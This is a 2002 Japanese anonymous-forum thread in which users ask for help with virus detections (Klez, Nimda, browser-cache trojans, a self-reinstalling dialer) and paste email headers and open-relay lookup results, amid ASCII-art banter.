名無しさん@お腹いっぱい。 :02/09/04 23:32
ここで聞くのか携帯板がいいのか迷ったんですが・・・ 最近携帯メール宛にウィルスメールと思われるものが来ます。 内容はエラーメッセージで、添付ファイル付き。 ドコモユーザーのため添付ファイルは自動的に削除されるので どんなファイルなのか分からないのですが 読んだだけでも感染するとかってあるんでしょうか? そもそも携帯メールのウィルスって周りじゃ聞いたことがないんですが 詳しい方がいらっしゃったら教えて下さい。
よーく考えろ Windows用にかかれたウィルスが携帯で実行できるかを
VirtualPC for DoCoMo
796 :
名無しさん@お腹いっぱい。 :02/09/04 23:55
>794、795さん すいません、私、全然詳しくないので考えても分からないです・・・ ごめんなさい。 実行出来ない、ということでよろしいんでしょうか? それとも有り得るという意味なんでしょうか? うっかりメールを読んでしまったので不安です。
>>795 あったら面白いかも。
でもバシリスクのエラーまみれで、エミュを業務に使うにあたっての限界を感じた。
>>796 ウィルスといってただのプログラム
PS2のソフトがファミコンで動くか?
それと同じ事
PC初心者板でも質問したのですが、 イマイチわからなかったので教えてください。 ノートンのリアルタイムスキャンで W32.Nimda.enc が引っかかります。 最近、毎日のようにひっかかります。 メーラーはOEですが、OEを常駐させていないときでも、突然 「C:\DOCUMENTS AND SETTINGS\ALL USERS\DOCUMENTS\# XXXX.eml」 に発見されたと言われます。 毎回自動隔離されているんですが、頻繁に起こるものなので・・・。 ノートン定義ファイルは最新版です。 隔離しても、ウイルスは有効で、かつPCをほうっておいても リアルタイムスキャンによるウイルス検出が起こる・・・ こういうもんなんでしょうか? ご教授の程、お願いします。
手動でnimdaが添付されてるらしきメールを削除
>>800 プレビュー機能を切って、OE上で・・・ということですか?
つまりマイドキュメント内で発見されるemlファイルは、
ニムダ本体によって定期的に生成されていて
ノートンはそれに反応している・・・という解釈でよろしいですか?
普段はバスターオンラインも反応しない・・・
バスターオンラインはダメなんですね・・・。
ありがとうございます。
>つまりマイドキュメント内で発見されるemlファイルは、 >ニムダ本体によって定期的に生成されていて >ノートンはそれに反応している・・・という解釈でよろしいですか? 感染してるわけじゃないんだから、んなわけない
>>802 ではなぜマイドキュメントでウイルスが発見されるんでしょうか・・・!?
>>804 ノートン最新定義ファイル
バスターオンライン
シマンテックオンライン
これらではPC内スキャンしても発見できませんでした。
時々リアルタイムスキャンでW32.Nimda.encが引っかかる。
マイドキュメントかマイピクチャーで。
専用駆除ツールを使わないと見つけることさえできない、と・・・!?
おそろしい・・・。
806 :
名無しさん@お腹いっぱい。 :02/09/05 01:12
してみると、いくら流行ってるとはいえ klezが危険度4で、nimdaが危険度3ってのは納得いかんね
http://www.ordb.org/lookup/?host=www.canonet.ne.jp このホストは ORDB.org に不正中継ホストとして登録されています。
データベースの検索結果: www.canonet.ne.jp (202.228.190.225)
ORDB.org への初回登録日時: 2002-08-19 00:44 GMT
初回送信ホスト: 195.82.124.110
最終検査日時: 2002-08-19 00:44 GMT
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin@bockscar.ordb.org
Received: from www.canonet.ne.jp (www.canonet.ne.jp [202.228.190.225])
by BocksCar.ORDB.org (Postfix) with ESMTP id 6E3435C47
for ; Mon, 19 Aug 2002 00:44:30 +0000 (GMT)
Received: from localhost.localdomain (ns.fgnet.dk [212.242.88.2])
by www.canonet.ne.jp (8.11.1/3.7W-01032503) with ESMTP id g7IMiQQ30724
for ; Mon, 19 Aug 2002 07:44:26 +0900 (JST)
Date: Mon, 19 Aug 2002 07:44:26 +0900 (JST)
Message-Id: <
[email protected] >
From:
[email protected] To: marvin%
[email protected] X-ORDB-Envelope-From:
[email protected] X-ORDB-Envelope-To: marvin%
[email protected] Subject: ORDB.org check (0.2807038021476490.2895395453) ip=202.228.190.225
∧_∧ / ̄ ̄ ̄ ̄ ̄ ( ´_ゝ`)< ふーん ( ) \_____ | | | (__)_) ∧_∧ ( ´,_ゝ`)プッ ( ) | | | (__)_)
>>806 了解です。
チェックしてきます。
>>807 いえ、それはわかるのですが、
なぜノートン&バスターオンラインでは反応しないのかな・・・と。
>>799 >>816 こんなのあったね。
http://www.symantec.com/region/jp/sarcj/data/e/enc.detection.html W32.Nimda.(Aor亜種)感染メールから添付ファイルを検疫した後の
残骸本文を検出したのか、W32.Nimdaの脅威を持つ新たな亜種を検出したのか、
どっちかということらしい。
> OEを常駐させていないときでも、突然・・・
もともとWindows自体にそういう挙動があるからね。
感染・懐疑ファイルにアクセスしようとするものがあれば、
当然、Nortonは割って入るだろうね。
それと、アンチウィルスが何か検知したらしい場合は、
掲示板で尋ねるのではなく、ベンダーのウィルス情報ページで調べ、
判らなければ、ベンダーに問い合わせるのが基本ではないかな?
このプロセスによって、新種・亜種が確認される場合もあり得るわけだから。
なんか上の方で安全とか言われてたんですが・・ ダウンロードした直後にウィルススキャンしたら やっぱウィルスだったみたいなんですが・・。
819 :
名無しさん@お腹いっぱい。 :02/09/05 16:00
圧縮されてるものを解凍するだけじゃ 絶対にウイルスに感染することは ないんでしょうか?
821 :
名無しさん@お腹いっぱい。 :02/09/05 16:10
i⌒i スッ
| 〈
∧_∧ / .フ
( ´_ゝ`)/ |
/ /. ノ
/ /\ / |
_| ̄ ̄ \ /. ノ__
\ ̄ ̄ ̄ ̄ ̄ ̄
>>822 \
||\ \
||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄||  ̄
|| || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
.|| ||
帰宅してくださいよ。
. |
∧_∧ ||
( ´_ゝ`). |||
/ \. |||| バチーン!!
/ /\ / ̄\ ┻|||| .' , ..
_| ̄ ̄ \ / ヽ \从// ・;`.∴ '
\ ̄ ̄ ̄ ̄ ̄ ̄ \__) < ,:;・,‘
||\ \ . ’ .' , ..
||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄
|| || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
.|| ||
825 :
名無しさん@お腹いっぱい。 :02/09/05 22:23
JS.Trojan.Cardst というウイルスにかかってしまいました 最近ダウンロードしたファイルはkageぐらいしか思いつきません 現時点での疑問点に答えていただけると助かります 1.ウイルス対策ソフトは持っていないのですが、駆除できますか? 2.現時点で他人に迷惑かけている可能性ありますか? 3.ウインドウズを再インストールしたら駆除できますか? (ウイルス対策ソフトを買うべきですか?)
825に追加です フリーのアンチドートの検索結果では、 C:\WINDOWS\Temporary Internet Files \Content.IE5\SL6V09M7\index[2].htm = ウイルス感染 : Trojan.JS.Cardst とでるのですが、\Temporary Internet Files以下のフォルダが見つかりません
> 2.現時点で他人に迷惑かけている可能性ありますか? ありますね...
>>825-826 デスクトップのIEのアイコンをマウス右押し→全般→インターネット一時ファイル→ファイルの削除。
829 :
名無しさん@お腹いっぱい。 :02/09/05 22:44
>826 >とでるのですが、\Temporary Internet Files以下のフォルダが見つかりません 隠しファイルは表示してる?
830 :
825=826 :02/09/05 22:59
831 :
825=826 :02/09/05 23:13
その後トレンドマイクロのオンラインスキャンで C:\WINDOWS\Temporary Internet Files を検索したら引っかかりなかったけど アンチドートだと感染してました。どうしよう・・・
832 :
名無しさん@お腹いっぱい。 :02/09/05 23:13
>>830 マイコンピューターから開くとフォルダ表示されないけど
エクスプローラーで見ると出てくるよ。
それか検索で削除とか。
833 :
名無しさん@お腹いっぱい。 :02/09/05 23:21
JS.Winbomb.d というウイルスにかかって ノートンで検疫したんですが 修復できないので、削除したらいいんですか? 削除して何か問題がおきたりしませんか?
834 :
825=826 :02/09/05 23:39
>>832 消えました。アンチドートでも引っかからなかったです
ありがとうございました
ところで、
C:\WINDOWS\Temporary Internet Filesの下のフォルダに
大量のファイルが眠っていたのですが消していいのでしょうか
HTML、JPEG、ZIP、サイズ0のファイルと盛りたくさんだったのですが
835 :
名無しさん@お腹いっぱい。 :02/09/05 23:58
ウイルスに感染した場合初期化して購入時に戻してしまえばウイルスは完全に消えてしまうのですか? どうしても削除できない場合なんかは初期化するわけですが・・・
839 :
名無しさん@お腹いっぱい。 :02/09/06 02:38
>>838 ありがとうございます。
返事遅くなってすいません。
すぐ削除します。
840 :
名無しさん@お腹いっぱい。 :02/09/06 04:02
>>793 亀レスだが、携帯電話平気。
携帯電話感染ウイルスがあったら大変なことになっている。
携帯上から見るリモートメールでパソコンに来ているウイルス付きメールを見ても、
パソコンも携帯電話も感染しないと思う。
841 :
名無しさん@お腹いっぱい。 :02/09/06 10:45
なんか最近ここみてるとセキュリティ警告というのがしきりに出るんですが、 なんなのでしょうか?
842 :
名無しさん@お腹いっぱい。 :02/09/06 11:12
友人から英語だらけで読めないメールが何度もきます。 友人に聞くと送ってないといわれました。 これってウイルスですか? 教えてください ( ̄人 ̄)オ・ネ・ガ・イ♪
只今までに検出されたウィルス
http://yuri.robot.mach.mie-u.ac.jp/~virusstat/old_log_2.txt 2002-06-20 10:22:07 W32.Klez.H@mm<
[email protected] >
2002-06-20 10:23:45 W32.Klez.H@mm<
[email protected] >
このホストは ORDB.org に不正中継ホストとして登録されています。
http://www.ordb.org/lookup/?host=smtp.interq-office.ne.jp データベースの検索結果: smtp.interq-office.ne.jp (211.125.80.40)
ORDB.org への初回登録日時: 2002-05-09 07:10 GMT
初回送信ホスト: 64.90.162.91 spam submitted to Spamcop
最終検査日時: 2002-09-05 17:32 GMT
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin@bockscar.ordb.org
Received: from smtp.interq-office.ne.jp (unknown [211.125.80.40])
by BocksCar.ORDB.org (Postfix) with ESMTP id 0CF16557F
for ; Thu, 5 Sep 2002 17:32:22 +0000 (GMT)
Received: from groundzero.ordb.org (groundzero.ordb.org [62.242.0.190])
by smtp.interq-office.ne.jp (8.9.3/Wang/19990809) with ESMTP id CAA17402
for <@[211.125.80.40]:marvin@marvin.ordb.org>; Fri, 6 Sep 2002 02:30:58 +0900 (JST)
Date: Fri, 6 Sep 2002 02:30:58 +0900 (JST)
From:
[email protected] Message-Id: <
[email protected] >
To: "@[211.125.80.40]":@smtp:marvin@marvin.ordb.org
X-ORDB-Envelope-From:
[email protected] X-ORDB-Envelope-To: @[211.125.80.40]:marvin@marvin.ordb.org
Subject: ORDB.org check (0.04072457706236320.687950450) ip=211.125.80.40
| |
| |
| |
|
>>844 帰 宅 せ よ .|
| |
| |
|___________∩____と⌒i
(~ヽ || | |
\\ / / / /
\\ _∧_∧ / /∧_∧/ /
\\/( ´_ゝ`) /( ´,_ゝ`) /
\UJ ( /
\ \ |
\ \ /
) )(___
/ ,. / )
/ /( (  ̄ ̄ ̄(. |
/ / |\ \ | |
/ ( ノ |\ \ ) |
| |
| |
| |
|
>>847 帰 宅 せ よ .|
| |
| |
|___________∩____と⌒i
(~ヽ || | |
\\ / / / /
\\ _∧_∧ / /∧_∧/ /
\\/( ´_ゝ`) /( ´,_ゝ`) /
\UJ ( /
\ \ |
\ \ /
) )(___
/ ,. / )
/ /( (  ̄ ̄ ̄(. |
/ / |\ \ | |
/ ( ノ |\ \ ) |
851 :
困っています :02/09/06 15:50
唐突にくだらない質問で申し訳ありませんが 携帯電話の番号だけからやりようによっては その持ち主の情報で解る事はあるのでしょうか? どなたかご回答宜しくお願いします。
>>851 くだらない質問だけでなく
さんざん既出
855 :
困っています :02/09/06 16:14
そうでしたか、それは申し訳ありませんでした。 それで重ね重ね申し訳ないのですが どのスレッドに解答があるのでしょうか? 本当に本当に申し訳ないのですが 教えて下さい
名簿屋から買う
858 :
名無しさん@お腹いっぱい。 :02/09/06 21:48
いきなりPCのデータ消えました、ウィルスみたいです、どうしたらいいですか? みたいな書き込みがいっぱいあると思ったんだけど・・・ きっちり仕事してんの?>>klez
今日破壊活動をするのはKlez.Eだけ。 Klez.Hは関係ない。
>>842 君と友人がウィルススキャンしてみれば判る。
両方対策ソフトなしなんていうなよ。
864 :
名無しさん@お腹いっぱい。 :02/09/07 10:48
Klez.Hキタ------------------ 初めてノートンが役に立ったよ。
866 :
名無しさん@お腹いっぱい。 :02/09/07 17:47
>861さん ありがとうございます。 ソフト持ってないので買ってきます。
868 :
名無しさん@お腹いっぱい。 :02/09/07 21:27
>>867 質問する前に自分でスキャンしましょう。
@ノートンorバスター
Aそして、フリーのアンチドート
869 :
名無しさん@お腹いっぱい。 :02/09/07 21:33
EZULAというファイルは、良くないものなのでしょうか? とりあえず検索かけ全部けしといたのですが・・
870 :
名無しさん@お腹いっぱい。 :02/09/07 22:06
2月から毎日、ウイルス付きメールが5通位来て困っています。
対策ソフトはNISをインストールして使っています。
検出ウイルスは殆どがklez.Eで、偽装しているので送信アドレスが
証拠となりませんが、メールのソースを添付して数回、プロバイダ
(自分の契約プロバイダと送信元アドレスのプロバイダ)に
相談してみると、送信元プロバイダから「このアドレス所持者が送信元と
思われるので、警告しておきます」との回答を得ました。
しかし、依然メールは一向に減りません。こういった場合、
メールアドレスを再取得する等以外に迷惑メールを来なくする方法は
無いのでしょうか?プロバイダのウイルス除去サービスは利用しています。
Return-Path: <
[email protected] *n.ne.jp>
>>870 Fromと自分のメールアドレスとメールサーバーを伏せて書き込んでください。
872 :
名無しさん@お腹いっぱい。 :02/09/07 23:22
outlookのメールを削除してしまいました。 現在出先からノートPCでのカキコミですので、 メールを全て保存してある、自宅のPCから明日にでも カキコミしたいと思います。 >872 肯定することになってしまいますが…そうなんです。 踏み台にされているのかも知れませんが、本人は無意識でネットを されているのでしょうか?
今日クレズ付きのメールが来ました。まぁそれはよくある事なので 無視しても良いのですが、ヘッダを見ると最初のReturn-Pathにある国会議員の HPのドメインが入っていました。さてどうしたもんでしょうか。 いちおうその人のHPにいってフォームから忠告を送信しようとしましたが エラーではねられました。努力はしたので、もしそこの事務所が感染源だと しても良心は傷みませんが、下手をすると祭がはじまったりして。 さてさて。
>>875 ヘッダをはっていいのかな?
あくまでもKLEZの偽装機能によるダミーアドレスかもしれないけど。
未確認情報を流すと相手が相手だけにヤヴァイ事になりませんか?
877 :
名無しさん@お腹いっぱい。 :02/09/08 00:01
>>873 おれに聞かれても。
とりあえず、喫茶店に「感染してない?」って聞いてみたら?
>>876 From(これは偽装)、自分のメールアドレス、自分のプロバイダの
メールサーバーのみを伏せて書き込んでください。
>>878 Received: by j.asahi-net.or.jp (ATSON-1) ; 7 Sep 2002 21:01:10 +0900
Received: by aardvark (awsmtp) ; 7 Sep 2002 21:01:09 +0900
Return-Path: <********@koizumi.gr.jp>
Received: from mx2.asahi-net.or.jp (mx2.asahi-net.or.jp [202.224.39.165])
by trantula.asahi-net.or.jp (8.11.6/3.7W) with ESMTP id g87C19j24360
for < *******@asahi-net.or.jp>; Sat, 7 Sep 2002 21:01:09 +0900 (JST)
Received: from imfep03.kcom.ne.jp (imfep03.kcom.ne.jp [210.174.120.149])
by mx2.asahi-net.or.jp (Postfix) with ESMTP id 179CB6110
for < *******@asahi-net.or.jp>; Sat, 7 Sep 2002 21:01:09 +0900 (JST)
Received: from Guanr ([61.115.253.210]) by imfep03.kcom.ne.jp
(InterMail vM.4.01.03.23 201-229-121-123-20010418) with SMTP
id <20020907120100.GZXN24386.imfep03.kcom.ne.jp@Guanr>
for < *******@asahi-net.or.jp>; Sat, 7 Sep 2002 21:01:00 +0900
From: sadist7 <*******@apparenet.ne.jp>
To: *******@asahi-net.or.jp
Subject: Language
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=Uf9v03EL7Bd
Message-Id: <20020907120100.GZXN24386.imfep03.kcom.ne.jp@Guanr>
Date: Sat, 7 Sep 2002 21:01:08 +0900
Delivery-Agent: @(#)$Id: local.c,v 1.59 2000/04/24 08:01:16 atson1 Exp $ on aardvark
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
こんな感じでよろしいの?
880 :
名無しさん@お腹いっぱい。 :02/09/08 01:05
こんなのきたよ!! タイトルなし 名前なし 全く表記なし 添付ファイル OPOKHFOP.EXE
>>880 何故か、スコシ遠い目にナタ。。。
今日のラストシーンのゴロウさんミタイニ
882 :
名無しさん@お腹いっぱい。 :02/09/08 02:03
( ´ _ゝ`)フーン
穴だらけになってしまいましたが・・・こんな感じです。
Return-Path: <
[email protected] *n.ne.jp>
Received: from ***.ne.jp (***.ne.jp [***])
by ***.ne.jp with ESMTP id g883ter19079
for <***@***.ne.jp>; Sun, 8 Sep 2002 12:55:40 +0900 (JST)
Received: from ***.ne.jp (localhost [***])
by isvw.vc.***.ne.jp (***) with ESMTP id 37A89780B
for <***@***.ne.jp>; Sun, 8 Sep 2002 12:55:40 +0900 (JST)
Received: from ***.ne.jp (mspool08.***.ne.jp [***])
by ***.ne.jp (***) with ESMTP id EE8457808
for <***@***.ne.jp>; Sun, 8 Sep 2002 12:55:39 +0900 (JST)
Received: (from root@localhost)
by mail.***.ne.jp id g883tdK19064
for <***@***.ne.jp>; Sun, 8 Sep 2002 12:55:39 +0900 (JST)
Received: from mgate17.***.ne.jp (mgate17.***.ne.jp [***])
by ***.ne.jp with ESMTP id g883tdr19057
for <***@***.ne.jp>; Sun, 8 Sep 2002 12:55:39 +0900 (JST)
Received: from smtp.dream.o*n.ne.jp (dream.o*n.ne.jp [211.6.83.50])
by mgate17.***.ne.jp with ESMTP id g883tcd06514
for <***@***.ne.jp>; Sun, 8 Sep 2002 12:55:38 +0900 (JST)
Received: from Qxsnfrcwq (p0428-ip03osakakita.osaka.o*n.ne.jp [211.123.237.174])
by smtp.dream.o*n.ne.jp (Postfix) with SMTP id 87D4128F3
for <***@***.ne.jp>; Sun, 8 Sep 2002 12:55:16 +0900 (JST)
From: ohta <***@***.***.ne.jp>
To: ***@***.ne.jp
Subject: CELLPADDING
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=MFj8H2h88WnS6uiQV3W88P665y1P0Jp59I5b
Message-Id: <
[email protected] *n.ne.jp>
Date: Sun, 8 Sep 2002 12:55:16 +0900 (JST)
X-UIDL: LX*#!X3G!!e]*"!Y+2!!
ついでに某プロバイダからの回答です・・・以前全く無くなりませんが。 (自分の契約プロバイダと違い、大変丁寧でした) この度はお問い合わせをいただき、ありがとうございます。 ***カスタマサポート担当 **と申します。 ご連絡を賜り誠に恐縮でございます。 また、大変お手数をお掛けいたしております。 この度、お客様よりお問い合わせをいただきましたウイルスメール 送信の当該者に対しましては、苦情が寄せられている旨ならびに、 ウイルス感染の恐れがあるため、ウィルス駆除ソフト等を利用して の最新定義ファイルによるウィルスチェック、ウィルスの駆除方法に つきまして、またインターネットへの接続はお控え頂くようご連絡を させていただきたいと存じます。 ご迷惑をお掛けいたしておりまして誠に申し訳ございません。 ***をよろしくお願いいたします。 ----- ***株式会社 サービスセンタ カスタマサポート担当
以前=依然のマチガイです
888 :
名無しさん@お腹いっぱい。 :02/09/08 14:31
なんか添え付けされてて空白のメール来て削除したんだが、 見ただけでウィルススキャンが反応。 助かったと思ったが今日起動した瞬間突然プリンターから ハート一文字 が紙に印刷されて出てきた なんですかこれ?
>>879 エラーメッセージ
<
[email protected] >:
210.174.125.4 does not like recipient.
Remote host said: 550 Invalid recipient:<
[email protected] >
Giving up on 210.174.125.4
第三者中継調査(Third Party Relay) - 結果表示
[email protected] を担当するメールサーバーの検査結果は以下の通りです。
210.174.125.4
<<< 220 imfep04.kcom.ne.jp ESMTP server
(InterMail vM.4.01.03.23 201-229-121-123-20010418)
正常:中継は拒否されました。
http://www.nanet.co.jp/rlytest/relaytest.html 第三者中継調査(Third Party Relay) - 結果表示
[email protected] を担当するメールサーバーの検査結果は以下の通りです。
指定したメールアドレスへのメールは、以下の2のサーバが担当しています。
orig2.neweb.ne.jp (pri=10)
<<< 220 imfep01.kcom.ne.jp
ESMTP server (InterMail vM.4.01.03.23 201-229-121-123-20010418)
正常:中継は拒否されました。
orig1.neweb.ne.jp (pri=10)
<<< 220 imfep03.kcom.ne.jp ESMTP server
(InterMail vM.4.01.03.23 201-229-121-123-20010418)
正常:中継は拒否されました。
/  ̄ ̄ ̄ ̄ \
/ \
/ ヽ
/ ⊂ニニニ⊃
⊂ニニニニニニニニ⊃
∧_∧ヽ(`Д´)ノ ⊂ニニニ⊃
( ´_ゝ`) (
>>889 /
( つーo皿 /
(_ ̄)'^◎ /⊂ニニニ⊃
|/(_) \ ____ /
◎
__ ,⌒ヽ / ̄ ̄ ̄ ̄ ̄
\ ' ヽ ) | 田 田
田 田| ) ) | 田 田
田 田| ) | 田 田
田 田| ) | 田 田
不正中継とフーン 「ふ」しかあってない
不正中継が分かったなら、対処しろよ
>>889 それとも、「俺ならこんだけ分かるんだぜ」とでも思ってんのか?
物凄く馬鹿な質問かもしれないんですがどなたか教えてください 自分はウィルスとかトロイとかネットで落とした後、必ずノートンでウィルスチェックしています すると毎回ウィルスが検出されます 例えばsub7からはsub7が検出されます これは正常なんでしょうか? それともsub7にsub7が仕込まれてるとゆうことなんでしょうか?
>>895 何がいいたいんでしょか。
大体ノートンのスキャンでヒットする時点で、テスト用の用途を除けば利用価値は無いです。
とりあえず、近所迷惑を顧みず歌ってください。
「愛を下さい! WowWow。。。。」
これで明日の朝、目がさめる時。君は今よりも幸せな、そして素敵な人生に遭遇してうろたえるでしょう。
今、メッセンジャーやってたらメッセンジャーの画面が40個ぐらい出てきたんですけどウイルスでしょうか?
>>898 まずウィルスに感染していないかどうかチェックしてから聞いてください
900 :
(*゚Д゚) :02/09/08 23:57
先程ノートン先生より突然の警告があったのですが、 VBS.LoveLetterの感染経路はoutlookやフリーメールだけでしょうか? どこかのページを踏んで感染ってありますか? プロバイダーのウイルス対策もしているし、 まるで身に覚えがありません。 警告がでたのに、 スキャンしてもウイルスが検出されません。 コワイよー
>>900 @マルチポストするな
Aスレッドが立ってる
902 :
(*゚Д゚) :02/09/09 00:05
>901 すみません。 初心者の部類なので どこにスレッドがあるか教えてください。
//dms100.org/worksucks このURLのウィルスがどういったものなのか教えて頂けませんか? 踏んでしまったんですけど今のところファイルが壊れた様子も無く ウイルスバスターOn-Line Scanでも感染ファイルは見つからないのですが、やはり不安です どなたかお願いします
906 :
名無しさん@お腹いっぱい。 :02/09/09 13:47
age
907 :
名無しさん@お腹いっぱい。 :02/09/09 15:02
>>905 ありがとう
おかげで感染ファイル見つかりますた
>>889 よく分からんですが、小泉氏のサーバーが不正中継に使われてるって事?
ウイルスの踏み台に?それはトロイか何かを仕込まれてるって事?
検索結果を直貼りされてもすみませんがよく分かりません。
親切ついでに解り易く教えて下さい。おねがいします。
すみません質問の仕方が悪かったです 例えばsub7が欲しくてsub7をダウンロードした場合に、ウィルスチェックするとsub7ウィルスが検出されます これが正常なのかと聞きたいんです もしsub7からsub7ウィルスが検出される事が当たり前だとしたら sub7にsub7を仕込んだ場合に、どうやって本物のsub7なのか、それともsub7が仕込まれたsub7なのかを見分けるのか非常に疑問です どなたか教えてください
895がネタだと思う人 手を上げて(´∀`)ノ
913 :
名無しさん@お腹いっぱい。 :02/09/10 01:34
WinMXで「ウイルス」って検索したら 「ウイルス90種類詰め合わせ」があったよ。 これって落としたひといる? Norton、ウイルスバスタ、アンチドートとかの ウイルススキャンの精度をたしかめてほすぃ。(自分は小心者でできやせん)
914 :
名無しさん@お腹いっぱい。 :02/09/10 01:52
今は使ってないWin98でウイルススキャンしたら 183ファイルも見つかった・・・どーりで不具合が出るわけだ klezってやつが多かったような
>>913 × (自分は小心者でできやせん)
○ (自分は面倒でできやせん)
呆れて物も言えん
916 :
名無しさん@お腹いっぱい。 :02/09/10 02:01
ああ、なんか「悪用現金! ウイルス90種詰合せ」って奴か 他にも120Mのウイルス rarファイルのがあるな 誰がこんなウイルスの塊を落とすんだ
WORM_KLEZ.Hの駆除の仕方が全くわからん。 誰か駆除した事ある人いたら教えてください。
918 :
名無しさん@お腹いっぱい。 :02/09/10 05:08
919 :
名無しさん@お腹いっぱい。 :02/09/10 18:40
自動接続ソフトをダウンロードしてしまいました。自分の不注意なのですが、 いくら、ダイヤルアップ接続を消しても、自動復活して、接続されてしまい ます。ロゴは「E−Z−LIVE」というとこの自動接続なんですが、 どうしたら、完全消去できるのでしょうか?(フォーマットというのは、 なしで、お願い致します。)
920 :
名無しさん@お腹いっぱい。 :02/09/10 18:57
ノートンのウイルススキャンをインストールしています。 全体をスキャンしても感染はありませんでした。 この状態でも感染している可能性はあるのでしょうか? (最近どうも不安定でして・・・・・・。)
921 :
名無しさん@お腹いっぱい。 :02/09/10 19:07
922 :
名無しさん@お腹いっぱい。 :02/09/10 19:10
>921 だめってことは、もう、どうにもならないんでしょうか? 根本ファイルを消せば(どこにあるか、わかりませんが) 直るのでしょうか? それとも、ウィルスの一種なんでしょうか? (さっき立ち上げたら、女性の裸体がでてきた・・・)
>>922 つか貴様PCQA板に行けって誘導されただろうが
なんでひつこく書き込むかな・・・
一生ダイヤルQ2で接続してろよ
>>922 レスありがとうございます。
定義ファイルはライブアップデートを行っていますので
最新だと思います。
貼っていただいたレジストリの最適化のスレで勉強してきます。
ありがとうございました。
926 :
名無しさん@お腹いっぱい。 :02/09/10 19:47
>>924 いや、どこにもいってません。スレ立てずに、質問スレに、
ということでしたので、はじめて、こちらにきました。
>>923 ありがとうございます。ただ、WIN98だし、根本的に
直るか、もうすこしやってみます。
ひつこく
929 :
名無しさん@お腹いっぱい。 :02/09/10 22:36
930 :
名無しさん@お腹いっぱい。 :02/09/10 22:38
your computer's data is currently at risk. download internet alert now! って出ます。。
931 :
名無しさん@お腹いっぱい。 :02/09/10 22:48
ようわからんけど 怖がらせて「うちのセキュリティ対策ソフト買うたら安全やで」って宣伝してるやつ おそらくJavaScriptとかActiveXの設定切ってないんでない? でもこれ IPわかったらクレジットカードの番号とか盗まれるとか書いてるから 悪質な脅しに近い会社だよなぁ・・・
933 :
名無しさん@お腹いっぱい。 :02/09/11 10:01
>>923 さんざん、やって、やっと直りました。
ありがとうございました。
あとは、ウィルス付でないことを切望します。
でも、邪悪なソフトがふえて、いやです。
>>933 邪悪なんじゃなくおまいさんが馬鹿なだけ
よく調べもしないであやしげなダイエット食品に手を出して
肝臓障害になったりしてるのと同じ
自己防衛もできないならPCなんぞ使わんほうが幸せ
936 :
名無しさん@お腹いっぱい。 :02/09/11 12:01
3通来てるんですが、これってウィルスでしょうか? ただのスパムメールでしょうか? 一応添付ファイルをNAVでかけてみたらウィルスらしきものを 検知したんですが、種類が分からないのです。 件名 1.SOS 2.Hellow,welcome to my hometown 3.Japanese lass' sexy picturers 添付ファイル 1.2530.scr 2.Ko.scr 3.Web.pif
937 :
名無しさん@お腹いっぱい。 :02/09/11 12:06
>>936 NAVで「ウィルスらしきもの」?
ウィルスならウィルスってはっきり検知して検出名も出るだろ。
レポートの活動ログみろ。
>>936 ウィルスだろうがスパムだろうが気持ち悪いものは全部PCから消せ。
(´-`).。oO(最近アンチウィルスソフト入れてるのに、これウィルスでしょうか?と訊くヤシまででてきた)
>>939 説明書読まないでただなんとなくインストールしてるんだよ
何かあってもヘルプファイルすらみない、ましてやその企業のサイトなんて見やしない
人間肉体的とか金銭的な実害が出ないと注意深くなんてなんないのかもね・・・
>937-938 ありがとう。 添付ファイルをエクスプローラーで開いてみようとしたら ノートンが感知しました。 「W32.Klez.E@mm」というのもでした。 受信時に感知しなかったので、ウィルスかどうか分かりませんでした。
感染してれば何かアクション起こしたときに常駐保護機能が反応するよ
再度ノートンでチェックしてみましたが 感染はありませんでした。 ありがとうございました。
945 :
名無しさん@お腹いっぱい。 :02/09/11 19:45
>934 935 ありがとうございます。ここのスレ自体、勉強になりますので。
その妙に空間を使った無意味なレイアウトやめれ。
947 :
名無しさん@お腹いっぱい。 :02/09/11 21:27
すみません、初心者なもので・・・
948 :
名無しさん@お腹いっぱい。 :02/09/11 22:22
今日の昼頃、 差出人空白 件名=ISO?等々の文字列 添付なし なメールが届きますた これ何でしょうか? 日が日なだけにブキミです
949 :
名無しさん@お腹いっぱい。 :02/09/11 22:23
先ほど変なメールが来て、開封したら確認ダイアログが出ずにウイルスに感染してしまいました。 オンラインスキャンで見たところ、PE.CAW.1416なるウイルスらしいのですが、 NAVが起動できず、駆除も出来ません。 どうしたら良いのでしょうか?駆除方法はありませんか?
>>949 ウィルスから身を守る知識のないやつがウィルス対策ソフトを導入してない時点で×
インターネットやめたほうがいいよ
一応導入してます・・。メールのウイルスチェックまでは機能させてませんが。 駆除方法はありませんか? 手遅れでしたらそう言っていただけるとまだ助かるのですが・・
体験版のウイルスバスタでもいれれば?
>>951 メールのウィルスチェック機能を起動をさせろ
パターンファイルを更新しろ
情報は小出しにするな
>>952 アップデートできないので意味なしです。
感染者がどうなったが知らんが かなり前のウィルスっぽいから体験版でも充分いけると思うが あとはBitDefenderFreeEditionとか しかしウィルス対策ソフトが入ってるなら感染した時点で発動するはずだが・・・ 常駐切ってるような馬鹿は逝ってよし、と
956 :
名無しさん@お腹いっぱい。 :02/09/12 10:44
そうです。
>>957 ノートンがウイルス反応しないのです(アップデート済)
ウイルス名を教えてください。
960 :
名無しさん@お腹いっぱい。 :02/09/12 11:02
[email protected] て奴から、件名「W32.Klez.E removal tools」なる
メールが来たが、多分これウィルスなんだろな。
ウィルスメール来たの初めてだ。
962 :
◆tHfDbgsU :02/09/12 11:20
>>17 それは****を修正して***を見直すんだ
検証のために W32.Hunch.H@mm W32.Hunch.I@mm が必要になったんですけど、どこかにありませんでしょうか? すみませんがよろしくお願いします。
埋め立てCHU!!
967 :
名無しさん@お腹いっぱい。 :02/09/12 20:08
過去スレageるのいい加減やめて欲しい。 日記書き綴るのいい加減やめて欲しい。 愚痴こぼすのいい加減やめて欲しい。
sage
メールアドレス晒してるのに まだあぼーんされないな
削除依頼もないのにあぼーんされるのか?
つかおまいら埋め立てろよ
umeume
埋め立て
う
980 :
名無しさん@お腹いっぱい。 :02/11/11 20:57
